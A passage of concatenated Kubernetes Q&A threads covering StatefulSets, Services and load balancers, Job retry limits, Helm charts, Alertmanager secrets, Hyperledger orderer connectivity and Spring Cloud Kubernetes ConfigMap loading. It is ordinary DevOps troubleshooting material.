pv-data-<statefulset_name>-N
</code></pre>
<p>StatefulSet makes the names (and not only the names, in fact) of your pods static and increments them depending on the replica count; that's why every Pod will match its own PVC and PV respectively.</p>
<blockquote>
<p>Note: this is called dynamic provisioning. You should be familiar with
configuring kubernetes control plane components (like
controller-manager) to achieve this, because you will need
configured persistent storage (one of them) providers and understand
the retain policy of your data, but this is completely another
question...</p>
</blockquote>
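<p>For reference, a minimal sketch of the Deployment above rewritten as a StatefulSet. It assumes a headless Service named <code>logstash</code> exists, since StatefulSets require a <code>serviceName</code>:</p>
<pre><code>apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: logstash
spec:
  serviceName: logstash        # assumed headless Service
  replicas: 3
  selector:
    matchLabels:
      app: logstash
  template:
    metadata:
      labels:
        app: logstash
    spec:
      containers:
      - name: logstash
        image: "logstash-image"
        imagePullPolicy: IfNotPresent
        volumeMounts:
        - mountPath: /data
          name: logstash-data
  volumeClaimTemplates:
  - metadata:
      name: logstash-data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 5G
</code></pre>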
|
<p>I'm using <strong>Docker Desktop for mac</strong> for <strong>Kubernetes</strong> in local desktop. I'm trying to connect to DB installed on my local machine within a pod but can't figure what should be the host address. How can I relate to the address of my machine within a pod?</p>
<p>Please note that I can't use the ip of my machine since the db port is blocked in my network.</p>
| <p>From Docker 18.03 onwards, you can use the special DNS name <code>host.docker.internal</code>, which resolves to the internal address used by the host.</p>
<p>Please look at the official docs <a href="https://docs.docker.com/docker-for-mac/networking/#per-container-ip-addressing-is-not-possible" rel="noreferrer">here</a> for more information on this.</p>
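<p>As a small sketch of how a pod spec could point at the database on your machine (the variable names and port 5432 are just assumptions for illustration):</p>
<pre><code>env:
- name: DB_HOST
  value: host.docker.internal   # resolves to the macOS host from inside the container
- name: DB_PORT
  value: "5432"                 # assumed port of the DB running on your machine
</code></pre>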
<p>If you're on an earlier version than Docker 18.03, you need to use the experimental DNS name <code>docker.for.mac.localhost</code> to resolve to the local host.</p>
<p>Hope this helps.</p>
|
<p>I have deployed my app on the limited available Kubernetes cluster on DigitalOcean.
I have a spring boot app with a service exposed on port 31744 for external using nodeport service config. </p>
<p>I created a Loadbalancer using the yaml config per DO link doc: <a href="https://www.digitalocean.com/docs/kubernetes/how-to/add-load-balancer/" rel="nofollow noreferrer">https://www.digitalocean.com/docs/kubernetes/how-to/add-load-balancer/</a> </p>
<p>However, I am not able to hook up to my service. Can you advise on how it can be done so I can access my service from the loadbalancer? </p>
<p>The following is my "kubectl get svc" output for my app service: </p>
<pre><code>NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
my-springboot NodePort 10.245.6.216 <none> 8080:31744/TCP 2d18h
kubernetes ClusterIP 10.245.0.1 <none> 443/TCP 3d20h
sample-load-balancer LoadBalancer 10.245.53.168 58.183.251.550 80:30495/TCP 2m6s
</code></pre>
<p>The following is my loadbalancer.yaml:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: sample-load-balancer
spec:
type: LoadBalancer
ports:
- protocol: TCP
port: 80
targetPort: 31744
name: http
</code></pre>
<p>My service.yaml:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: my-springboot
labels:
app: my-springboot
tier: backend
spec:
type: NodePort
ports:
# the port that this service should serve on
- port: 8080
selector:
app: my-springboot
tier: backend
</code></pre>
<p>Thanks</p>
| <p>To expose your service using <code>LoadBalancer</code> instead of <code>NodePort</code> you need to provide <code>type</code> in service as <code>LoadBalancer</code>. So your new service config yaml will be:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: my-springboot
labels:
app: my-springboot
tier: backend
spec:
type: LoadBalancer
ports:
# the port that this service should serve on
- port: 8080
selector:
app: my-springboot
tier: backend
</code></pre>
<p>Once you apply the above service yaml file, you will get the external IP in <code>kubectl get svc</code> which can be used to access the service from outside the kubernetes cluster.</p>
|
<p>As stated in the title I am experiencing error </p>
<blockquote>
<p>Back-off restarting failed container while creating a service</p>
</blockquote>
<p>I've seen questions on Stack Overflow but I am still not sure how to resolve it.</p>
<p>This is my <strong>deployment yaml file</strong>:</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: book-api
spec:
replicas: 1
revisionHistoryLimit: 10
template:
metadata:
name: book-api
labels:
app: book-api
spec:
containers:
- name: book-api
image: newmaster/kubecourse-books:v1
ports:
- name: http
containerPort: 3000
</code></pre>
<p>while the <strong>service deployment file</strong> is:</p>
<pre><code>kind: Service
apiVersion: v1
metadata:
name: exampleservice
spec:
selector:
app: myapp
ports:
- protocol: "TCP"
# Port accessible inside cluster
port: 8081
# Port to forward to inside the pod
targetPort: 8080
# Port accessible outside cluster
nodePort: 30000
type: LoadBalancer
</code></pre>
<p>This is my Dockerfile:</p>
<pre><code>FROM node:alpine
# Create app directory
WORKDIR /src
# Install app dependencies
COPY package.json /src/
COPY package-lock.json /src/
RUN npm install
# Bundle app source
ADD . /src
RUN npm run build
EXPOSE 3000
CMD [ "npm", "run serve" ]
</code></pre>
<p>I have no idea how to resolve this issue, I am newbie in the Kubernetes and DevOps world.
Repo is over here: <a href="https://github.com/codemasternode/BookService.Kubecourse.git" rel="nofollow noreferrer">https://github.com/codemasternode/BookService.Kubecourse.git</a></p>
| <p>I tried to run your deployment locally and this is what the log shown:</p>
<pre><code>kubectl log book-api-8d98bf6d5-zbv4q
Usage: npm <command>
where <command> is one of:
access, adduser, audit, bin, bugs, c, cache, ci, cit,
clean-install, clean-install-test, completion, config,
create, ddp, dedupe, deprecate, dist-tag, docs, doctor,
edit, explore, get, help, help-search, hook, i, init,
install, install-ci-test, install-test, it, link, list, ln,
login, logout, ls, outdated, owner, pack, ping, prefix,
profile, prune, publish, rb, rebuild, repo, restart, root,
run, run-script, s, se, search, set, shrinkwrap, star,
stars, start, stop, t, team, test, token, tst, un,
uninstall, unpublish, unstar, up, update, v, version, view,
whoami
npm <command> -h quick help on <command>
npm -l display full usage info
npm help <term> search for help on <term>
npm help npm involved overview
Specify configs in the ini-formatted file:
/root/.npmrc
or on the command line via: npm <command> --key value
Config info can be viewed via: npm help config
[email protected] /usr/local/lib/node_modules/npm
</code></pre>
<p>It seems no command is running by default with the newmaster/kubecourse-books:v1 </p>
<p>I guess if you want to run the default npm command, you could run the following deploy config (note the <code>command</code> value):</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: book-api
spec:
replicas: 1
revisionHistoryLimit: 10
template:
metadata:
name: book-api
labels:
app: book-api
spec:
containers:
- name: book-api
image: newmaster/kubecourse-books:v1
command: ["npm", "start"]
ports:
- name: http
containerPort: 3000
</code></pre>
|
<p>As a QA in our company I am daily user of kubernetes, and we use kubernetes job to create performance tests pods. One advantage of job, according to the <a href="https://kubernetes.io/docs/concepts/workloads/controllers/jobs-run-to-completion/" rel="nofollow noreferrer">docs</a>, is </p>
<blockquote>
<p>to create one Job object in order to reliably run one Pod to completion</p>
</blockquote>
<p>But in our tests this feature will create infinite pods if previous ones fail, which will occupy resources of our team's shared cluster, and deleting such pods will take a lot of time. see this image:
<a href="https://i.stack.imgur.com/6pjF2.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/6pjF2.png" alt="enter image description here"></a></p>
<p>Currently the job manifest is like this:</p>
<pre><code> {
"apiVersion": "batch/v1",
"kind": "Job",
"metadata": {
"name": "upgradeperf",
"namespace": "ntg6-grpc26-tts"
},
"spec": {
"template": {
"spec": {
"containers": [
{
"name": "upgradeperfjob",
"image":
"mycompany.com:5000/ncs-cd-qa/upgradeperf:0.1.1",
"command": [
"python",
"/jmeterwork/jmeter.py",
"-gu",
"[email protected]:mobility-ncs-tools/tts-cdqa-tool.git",
"-gb",
"upgradeperf",
"-t",
"JMeter/testcases/ttssvc/JMeterTestPlan_ttssvc_cmpsize.jmx",
"-JtestDataFile",
"JMeter/testcases/ttssvc/testData/avaml_opus.csv",
"-JthreadNum",
"3",
"-JthreadLoopCount",
"1500",
"-JresultsFile",
"results_upgradeperf_cavaml_opus_t3_l1500.csv",
"-Jhost",
"mtl-blade32-03.mycompany.com",
"-Jport",
"28416"
]
}
],
"restartPolicy": "Never",
"imagePullSecrets": [
{
"name": "docker-registry-secret"
}
]
}
}
}
}
</code></pre>
<p>In some cases, such as a misconfigured IP/port, 'reliably run one Pod to completion' is impossible, and recreating pods is a waste of time and resources.
So is it possible, and if so how, to limit a Kubernetes Job to create a maximum number (say 3) of pods if they always fail?</p>
| <p>Depending on your kubernetes version, you can resolve this problem with these methods:</p>
<ol>
<li><p>Set the option <code>restartPolicy: OnFailure</code>; then the failed container will be restarted in the same Pod, so you will not get lots of failed Pods, instead you will get a Pod with lots of restarts.</p></li>
<li><p>From Kubernetes 1.8 on, there is a parameter <code>backoffLimit</code> to control the retries of a failed Job. This parameter defines how many times the Job is retried before it is treated as failed (default 6 times). For this parameter to work you must set <code>restartPolicy: Never</code> (see the sketch after this list).</p></li>
</ol>
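<p>A minimal sketch of the second option applied to the Job from the question (the command arguments are omitted for brevity; <code>backoffLimit: 3</code> makes Kubernetes stop retrying after 3 failed Pods):</p>
<pre><code>apiVersion: batch/v1
kind: Job
metadata:
  name: upgradeperf
spec:
  backoffLimit: 3          # give up after 3 failed Pods
  template:
    spec:
      restartPolicy: Never
      containers:
      - name: upgradeperfjob
        image: mycompany.com:5000/ncs-cd-qa/upgradeperf:0.1.1
      imagePullSecrets:
      - name: docker-registry-secret
</code></pre>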
|
<p>I'm running a SSE server on a VPS and it works perfectly, no problems at all, but due to scalability reasons I needed to move it to another server.</p>
<p>I moved the server to <strong>Google Cloud Platform/Google Container Engine</strong> and <strong>Kubernetes/Ingress</strong>. But now I've encountered that I can't keep a SSE connection effectively, it's completely unstable and it closes connections by itself.</p>
<p>Is there anything special I have to do to run a <strong>SSE</strong> server over <strong>Kubernetes/Ingress</strong>?</p>
<p>I assume my code/software runs perfect and that is not the issue, due it works perfectly in Kubernetes, VPS, on my machine, everywhere, just not when I add the Ingress configuration, and I'm doing this because I want <strong>HTTPS</strong> over the <strong>Kubernetes</strong> <strong>load-balancer</strong>.</p>
| <p>It's not really possible to do this reliably; it may work for some clients and not for others. The explanation lies in how Kubernetes behaves. <a href="https://i.stack.imgur.com/3Kcx5.jpg" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/3Kcx5.jpg" alt="enter image description here"></a>
Let's suppose your app runs on 3 nodes (a node is a virtual machine). When a request is made, Kubernetes has to decide which of these virtual machines will handle it. In the case of <a href="https://www.w3schools.com/html/html5_serversentevents.asp" rel="nofollow noreferrer">SSE</a> this connection must persist until the client closes your app. With this in mind, let's suppose you have a chat app.
So we have two clients; now let's suppose Kubernetes always redirects clients 1 and 2 to node 1 <a href="https://i.stack.imgur.com/J04a4.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/J04a4.png" alt="enter image description here"></a></p>
<p>When an SSE connection (green line) is established, it will persist. Now let's suppose client 1 sends a message; as I said before, in this case everything goes through node 1,
<a href="https://i.stack.imgur.com/zCQrR.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/zCQrR.png" alt="enter image description here"></a>
so the node will handle the request, your app will check in memory whether the receiver is connected and, if so, it will send the message through the SSE connection <a href="https://i.stack.imgur.com/33Baj.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/33Baj.png" alt="enter image description here"></a> In this case everything works perfectly. The problem appears when the clients are not redirected to the same node
<a href="https://i.stack.imgur.com/wZDcT.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/wZDcT.png" alt="enter image description here"></a></p>
<p>When a client sends a message,<a href="https://i.stack.imgur.com/9ESvU.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/9ESvU.png" alt="enter image description here"></a>
it will go through node 1, but when node 1 checks whether client 2 is connected it won't find the connection, because that connection was not saved on this node, so client 2 won't receive the message. To solve this problem you need a different structure: one instance dedicated only to SSE connections, so that when a client opens an SSE connection it goes to this dedicated instance <a href="https://i.stack.imgur.com/yqGpS.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/yqGpS.png" alt="enter image description here"></a>
and when client 1 sends a message <a href="https://i.stack.imgur.com/R6uxa.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/R6uxa.png" alt="enter image description here"></a>
the nodes will communicate with this dedicated instance, and it will deliver the message to client 2 <a href="https://i.stack.imgur.com/kXcAY.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/kXcAY.png" alt="enter image description here"></a></p>
<p>Now, to create this dedicated server you could use an external service, or better, create your own instance and redirect your SSE endpoint to it. You can do this with a load balancer acting as a proxy, which decides which resource to redirect to based on the incoming URL (<a href="https://cloud.google.com/load-balancing/docs/https/url-map" rel="nofollow noreferrer">more info</a>).
You also need to configure this dedicated SSE server not to close connections too fast.</p>
|
<p>I'm using helm charts to create deploy micro services, by executing helm create it creates basic chart with deployment, services and ingress but I have few other configurations such as horizontal pod autoscaler, pod disruption budget. </p>
<p>what I do currently copy the yaml and change accordingly, but this takes lot of time and I don't see this as a (correct way/best practice) to do it. </p>
<pre><code>helm create <chartname>
</code></pre>
<p>I want to know how you can create helm charts and have your extra configurations as well. </p>
| <p>Bitnami's <a href="https://docs.bitnami.com/kubernetes/how-to/create-your-first-helm-chart/" rel="nofollow noreferrer">guide to creating your first helm chart</a> describes <code>helm create</code> as "the best way to get started" and says that "if you already have definitions for your application, all you need to do is replace the generated YAML files for your own". The approach is also suggested in the <a href="https://docs.helm.sh/using_helm/#creating-your-own-charts" rel="nofollow noreferrer">official helm docs</a> and the <a href="https://docs.helm.sh/developing_charts/#using-helm-to-manage-charts" rel="nofollow noreferrer">chart developer guide</a>. So you are acting on best advice.</p>
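<p>For example, if you wanted the chart to carry a HorizontalPodAutoscaler as well, you could drop an extra template such as the sketch below into the chart's <code>templates/</code> directory. The chart name <code>mychart</code> and the <code>.Values.autoscaling.*</code> keys are assumptions; wire them up to your own <code>values.yaml</code>:</p>
<pre><code># templates/hpa.yaml (hypothetical values keys)
apiVersion: autoscaling/v1
kind: HorizontalPodAutoscaler
metadata:
  name: {{ template "mychart.fullname" . }}
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: {{ template "mychart.fullname" . }}
  minReplicas: {{ .Values.autoscaling.minReplicas }}
  maxReplicas: {{ .Values.autoscaling.maxReplicas }}
  targetCPUUtilizationPercentage: {{ .Values.autoscaling.targetCPUUtilizationPercentage }}
</code></pre>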
<p>It would be cool if there were a wizard you could use to take existing kubernetes yaml files and make a helm chart from them. One tool like this that is currently available is <a href="https://github.com/appscode/chartify" rel="nofollow noreferrer">chartify</a>. It is listed on helm's <a href="https://github.com/helm/helm/blob/master/docs/related.md" rel="nofollow noreferrer">related projects page</a> (and I couldn't see any others that would be relevant).</p>
|
<p>I am writing some unit-tests for a sample Kubernetes CRD and controller created using Kubebuilder. The main code in the controller creates Kubernetes resources (a namespace and a ResourceQuota inside it). In my unit-tests, I want to verify that the controller actually created these. I use a <code>client.Client</code> object created using the default <code>sigs.k8s.io/controller-runtime/pkg/manager</code> object.</p>
<pre><code>mgr, _ := manager.New(cfg, manager.Options{})
cl := mgr.GetClient()
rq := &corev1.ResourceQuota{}
err = cl.Get(ctx, types.NamespacedName{Name: "my-quota", Namespace:
"my-namespace"}, rq)
</code></pre>
<p>I know that the main code works fine because I tested it in a real, live environment. I see that the main code gets called from the unit tests. However, the above code in the unit tests does not work; i.e. the call to Get() does the return the ResourceQuota I expect. I've also tried the List() api but that too does not return anything. There is no error either. Just an empty response.</p>
<p>Do I have to do something special/different for getting the K8S control plane in Kubebuilder to run unit tests?</p>
| <p>Posting this in case others find it useful. If you want to access other K8S resources, you would need to use the standard <code>clientSet</code> object from Kubernetes' client-go. For e.g. if you want to confirm that a specific namespace called <code>targetNamespace</code> exists:</p>
<pre><code>mgr, _ := manager.New(cfg, manager.Options{})
generatedClient := kubernetes.NewForConfigOrDie(mgr.GetConfig())
nsFound := false
namespaces := generatedClient.CoreV1().Namespaces()
namespaceList, _ := namespaces.List(metav1.ListOptions{})
for _, ns := range namespaceList.Items {
if ns.Name == targetNamespace {
nsFound = true
break
}
}
g.Expect(nsFound).To(gomega.BeTrue())
log.Printf("Namespace %s verified", targetNamespace)
</code></pre>
|
<p>I was working on Jenkins for many days and deploy my services to Kubernetes.</p>
<p>I recently came across Jenkins X, and I also found a Helm chart for Jenkins through which I can host Jenkins in Kubernetes. Now I'm confused: are they both the same?</p>
| <p>No they are different. I assume the helm chart you found installs and configure Jenkins on Kubernetes - perhaps configured with some agents to run builds. </p>
<p>Jenkins X is a kubernetes native implementation of CI/CD, it uses some components of Jenkins, but has a lot more to it (for example, applications, environments, review apps, deployments and so on) for running apps ON kubernetes in a CI/CD fashion. The Jenkins helm chart likely sets up a single server. </p>
<p>edit: in the time since, Jenkins X has evolved a lot. It is now build using he Tekton engine for pipeline by default, and has many moving parts, so is quite different from running a more classic like Jenkins master/agent setup in a Kubernetes cluster. </p>
|
<p>my question is:</p>
<p>How do I reserve Azure Kubernetes Service (AKS) VMs?</p>
<p><a href="https://azure.microsoft.com/en-us/pricing/calculator/" rel="nofollow noreferrer">https://azure.microsoft.com/en-us/pricing/calculator/</a> </p>
<p>The pricing calculator shows that I can reserve VMs for 3 years; that option exists when buying VMs, but not when buying AKS.</p>
<p>What is the flow?</p>
<p>Should I reserve them as VMs and then call support to transfer them to the AKS flow?</p>
<p>I am asking this question here because Microsoft links Stack Overflow as its "community" forum.</p>
<p><a href="https://azure.microsoft.com/en-us/support/community/" rel="nofollow noreferrer">https://azure.microsoft.com/en-us/support/community/</a></p>
<p><a href="https://i.stack.imgur.com/Oeosm.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/Oeosm.png" alt="enter image description here"></a></p>
| <p><a href="https://learn.microsoft.com/en-us/azure/virtual-machines/windows/prepay-reserved-vm-instances?toc=/azure/billing/TOC.json#next-steps" rel="nofollow noreferrer">https://learn.microsoft.com/en-us/azure/virtual-machines/windows/prepay-reserved-vm-instances?toc=/azure/billing/TOC.json#next-steps</a></p>
<p>After you buy reservations they are applied automatically to the VMs you are buying: The reservation discount is applied automatically to the number of running virtual machines that match the reservation scope and attributes.</p>
<p>So you just have to buy adequate reservations that are scoped properly</p>
|
<p>I've created a label with:</p>
<p><code>kubectl label pods <pod id> color=green</code></p>
<p>but removing it using:</p>
<p><code>kubectl label pods bar -color</code></p>
<p>gives:</p>
<p><code>unknown shorthand flag: 'c' in -color</code></p>
<p>Any suggestions?</p>
| <p>The dash goes at the end of the label name to remove it, per <code>kubectl help label</code>:</p>
<pre><code># Update pod 'foo' by removing a label named 'bar' if it exists.
# Does not require the --overwrite flag.
kubectl label pods foo bar-
</code></pre>
<p>So try <code>kubectl label pods bar color-</code>.</p>
|
<p>I have a process where I use a Kubernetes client to build a deployment and a service. This process works fine but I have to wait some time for google to assign it an external IP. I cant seem to find anything in googles docs about a possible event emitter for when this process is done. Is there a way to programmatically pass or configure a request that can be made to a REST api that could go out and retrieve the info once it its ready?</p>
| <p>Yes. I assume that you mean to assign a <a href="https://kubernetes.io/docs/concepts/services-networking/#loadbalancer" rel="nofollow noreferrer">LoadBalancer</a> type of address to your Kubernetes <a href="https://kubernetes.io/docs/concepts/services-networking/service/" rel="nofollow noreferrer">service</a>. You can manually query the GCP API to see if your Load Balancer IP has been allocated. For example, <a href="https://cloud.google.com/compute/docs/reference/rest/v1/addresses/get" rel="nofollow noreferrer">GET</a> a resource address.</p>
<p>You can also use the <a href="https://cloud.google.com/sdk/gcloud/reference/compute/addresses/" rel="nofollow noreferrer">gcloud</a> command.</p>
<p><a href="https://cloud.google.com/load-balancing/docs/apis" rel="nofollow noreferrer">Here is</a> a list of all the GCP APIs related to load balancing that you can use.</p>
|
<p>I am trying to deploy Hyperledger fabric 1.0.5 on k8s, and use the balance transfer to test it. Everything is right before instantiate-chaincode, and I get this:</p>
<pre><code>[2019-01-02 23:23:14.392] [ERROR] instantiate-chaincode - Failed to send instantiate transaction and get notifications within the timeout period. undefined
[2019-01-02 23:23:14.393] [ERROR] instantiate-chaincode - Failed to order the transaction. Error code: undefined
</code></pre>
<p>and I use <code>kubectl logs</code> to get the peer0's log which is like this:</p>
<pre><code>[ConnProducer] NewConnection -> ERRO 61a Failed connecting to orderer2.orderer1:7050 , error: context deadline exceeded
[ConnProducer] NewConnection -> ERRO 61b Failed connecting to orderer1.orderer1:7050 , error: context deadline exceeded
[ConnProducer] NewConnection -> ERRO 61c Failed connecting to orderer0.orderer1:7050 , error: context deadline exceeded
[deliveryClient] connect -> DEBU 61d Connected to
[deliveryClient] connect -> ERRO 61e Failed obtaining connection: Could not connect to any of the endpoints: [orderer2.orderer1:7050 orderer1.orderer1:7050 orderer0.orderer1:7050]
</code></pre>
<p>I checked the connectivity of <code>orderer0:7050</code> and found no problem.</p>
<p>What should I do next?</p>
<p>Thank for help!</p>
| <p>You didn't describe what runbook you followed to deploy Hyperledger Fabric but looks like your pods cannot find each other <a href="https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/" rel="nofollow noreferrer">through DNS</a>. If you are following Kubernetes standards your pods should be in the <code>orderer1</code> namespace and hopefully, you have Kubernetes <a href="https://kubernetes.io/docs/concepts/services-networking/service/" rel="nofollow noreferrer">services</a> for <code>orderer0</code>, <code>orderer1</code>, and <code>orderer2</code>.</p>
<p>You can read more about communication between the Fabric components <a href="http://www.think-foundry.com/deploy-hyperledger-fabric-on-kubernetes-part-1/" rel="nofollow noreferrer">here</a> in the "Communication between Fabric components" section. Also, read on the "Work around the chaincode sandbox" where it shows you a workaround for <code>--dns-search</code>.</p>
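<p>A quick way to confirm the names resolve from inside the cluster (assuming the services really do live in the <code>orderer1</code> namespace) is something like:</p>
<pre><code>kubectl -n orderer1 get svc
# run a throwaway pod and test DNS resolution of one orderer service
kubectl run dnstest --rm -it --image=busybox --restart=Never -- nslookup orderer0.orderer1
</code></pre>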
|
<p>I have configured Prometheus & Grafana in GCP kubernetes Environment using the KB's provided in <a href="https://github.com/coreos/prometheus-operator/tree/master/contrib/kube-prometheus/manifests" rel="nofollow noreferrer">https://github.com/coreos/prometheus-operator/tree/master/contrib/kube-prometheus/manifests</a> </p>
<p>All are working perfect and my cluster details are showing in Grafana. Now I want to configure alert for Prometheus and need to integrate to my slack channel. If anyone have any Idea about this please let me know.</p>
<p>Thanks in advance</p>
| <p>Using the prometheus-operator, it took me a while to figure out that the alertmanager configuration is stored as a secret in
<a href="https://github.com/coreos/prometheus-operator/blob/master/contrib/kube-prometheus/manifests/alertmanager-secret.yaml" rel="nofollow noreferrer">https://github.com/coreos/prometheus-operator/blob/master/contrib/kube-prometheus/manifests/alertmanager-secret.yaml</a></p>
<p>You would need to decode it, edit, encode and apply</p>
<pre><code>echo "Imdsb2JhbCI6IAogICJyZXNvbHZlX3RpbWVvdXQiOiAiNW0iCiJyZWNlaXZlcnMiOiAKLSAibmFtZSI6ICJudWxsIgoicm91dGUiOiAKICAiZ3JvdXBfYnkiOiAKICAtICJqb2IiCiAgImdyb3VwX2ludGVydmFsIjogIjVtIgogICJncm91cF93YWl0IjogIjMwcyIKICAicmVjZWl2ZXIiOiAibnVsbCIKICAicmVwZWF0X2ludGVydmFsIjogIjEyaCIKICAicm91dGVzIjogCiAgLSAibWF0Y2giOiAKICAgICAgImFsZXJ0bmFtZSI6ICJEZWFkTWFuc1N3aXRjaCIKICAgICJyZWNlaXZlciI6ICJudWxsIg==" | base64 --decode
</code></pre>
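<p>A sketch of that edit cycle, assuming the kube-prometheus defaults (a secret named <code>alertmanager-main</code> in the <code>monitoring</code> namespace with the key <code>alertmanager.yaml</code>; check the actual secret name in your cluster):</p>
<pre><code>kubectl -n monitoring get secret alertmanager-main -o jsonpath='{.data.alertmanager\.yaml}' | base64 --decode > alertmanager.yaml
# edit alertmanager.yaml to add your Slack receiver/route, then re-apply it
kubectl -n monitoring create secret generic alertmanager-main \
  --from-file=alertmanager.yaml --dry-run -o yaml | kubectl -n monitoring apply -f -
</code></pre>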
|
<p>I have this demo project which prints a label that is read from the configurations.</p>
<p>This is my main class:</p>
<pre><code>@SpringBootApplication
@EnableDiscoveryClient
@RestController
public class DemoApplication {
private MyConfig config;
private DiscoveryClient discoveryClient;
@Autowired
public DemoApplication(MyConfig config, DiscoveryClient discoveryClient) {
this.config = config;
this.discoveryClient = discoveryClient;
}
@RequestMapping("/")
public String info() {
return config.getMessage();
}
public static void main(String[] args) {
SpringApplication.run(DemoApplication.class, args);
}
@RequestMapping("/services")
public String services() {
StringBuilder b = new StringBuilder();
discoveryClient.getServices().forEach((s) -> b.append(s).append(" , "));
return b.toString();
}
}
</code></pre>
<p>And the <code>MyConfig</code> class is:</p>
<pre><code>@Configuration
@ConfigurationProperties(prefix = "bean")
public class MyConfig {
private String message = "a message that can be changed live";
public String getMessage() {
return message;
}
public void setMessage(String message) {
this.message = message;
}
}
</code></pre>
<p>The <code>bootstrap.properties</code> contain:</p>
<pre><code>spring.application.name=demo
spring.cloud.kubernetes.config.name=demo
spring.cloud.kubernetes.config.enabled=true
spring.cloud.kubernetes.config.namespace=default
spring.cloud.kubernetes.reload.enabled=true
spring.cloud.kubernetes.reload.monitoring-config-maps=true
spring.cloud.kubernetes.reload.strategy=refresh
spring.cloud.kubernetes.reload.mode=event
management.endpoint.refresh.enabled=true
management.endpoints.web.exposure.include=*
</code></pre>
<p>And the dependencies in <code>build.gradle</code>:</p>
<pre><code>dependencies {
compile("org.springframework.boot:spring-boot-starter-web")
compile("org.springframework.boot:spring-boot-starter-actuator")
compile("org.springframework.cloud:spring-cloud-starter-kubernetes:+")
compile("org.springframework.cloud:spring-cloud-starter-kubernetes-config:+")
testCompile('org.springframework.boot:spring-boot-starter-test')
runtime("org.springframework.boot:spring-boot-properties-migrator")
}
</code></pre>
<p>I'm creating the ConfigMap with <code>kubectl create -f configmap-demo.yml</code> being the content:</p>
<pre><code>apiVersion: v1
kind: ConfigMap
metadata:
name: demo
data:
bean.message: This is an info from k8
</code></pre>
<p>When deploying in Kubernetes I get the following error on Spring Boot startup:</p>
<pre><code>2019-01-02 13:41:41.462 INFO 1 --- [ main] trationDelegate$BeanPostProcessorChecker : Bean 'configurationPropertiesRebinderAutoConfiguration' of type [org.springframework.cloud.autoconfigure.ConfigurationPropertiesRebinderAutoConfiguration$$EnhancerBySpringCGLIB$$e13002af] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying)
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.1.1.RELEASE)
2019-01-02 13:41:41.940 INFO 1 --- [ main] b.c.PropertySourceBootstrapConfiguration : Located property source: ConfigMapPropertySource {name='configmap.demo.default'}
2019-01-02 13:41:41.942 INFO 1 --- [ main] b.c.PropertySourceBootstrapConfiguration : Located property source: SecretsPropertySource {name='secrets.demo.default'}
2019-01-02 13:41:42.030 INFO 1 --- [ main] com.example.demo.DemoApplication : The following profiles are active: kubernetes
2019-01-02 13:41:43.391 INFO 1 --- [ main] o.s.cloud.context.scope.GenericScope : BeanFactory id=416ee750-8ebb-365d-9114-12b51acaa1e0
2019-01-02 13:41:43.490 INFO 1 --- [ main] trationDelegate$BeanPostProcessorChecker : Bean 'org.springframework.cloud.autoconfigure.ConfigurationPropertiesRebinderAutoConfiguration' of type [org.springframework.cloud.autoconfigure.ConfigurationPropertiesRebinderAutoConfiguration$$EnhancerBySpringCGLIB$$e13002af] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying)
2019-01-02 13:41:43.917 INFO 1 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
2019-01-02 13:41:43.952 INFO 1 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
2019-01-02 13:41:43.953 INFO 1 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat/9.0.13
2019-01-02 13:41:43.969 INFO 1 --- [ main] o.a.catalina.core.AprLifecycleListener : The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: [/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjdk/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib]
2019-01-02 13:41:44.156 INFO 1 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
2019-01-02 13:41:44.157 INFO 1 --- [ main] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 2033 ms
2019-01-02 13:41:44.957 INFO 1 --- [ main] o.s.s.concurrent.ThreadPoolTaskExecutor : Initializing ExecutorService 'applicationTaskExecutor'
